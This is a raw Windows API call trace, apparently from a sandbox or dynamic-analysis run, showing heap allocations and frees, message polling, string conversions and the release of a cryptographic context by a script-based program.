PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0184.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0184.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0184.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0184.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0184.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0184.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.790] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0184.790] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0184.790] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0184.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0184.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0184.790] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0184.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0184.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0184.791] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0184.791] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0184.791] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0184.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.791] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0184.792] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0184.792] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.792] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.792] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0184.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0184.793] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.794] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0184.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0184.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0184.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.795] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.795] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.795] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.795] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0184.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0184.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.796] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0184.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0184.796] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0184.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0184.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0184.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0184.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0184.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0184.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0184.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0184.878] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0184.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0184.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0184.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0184.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0184.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.878] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0184.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0184.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 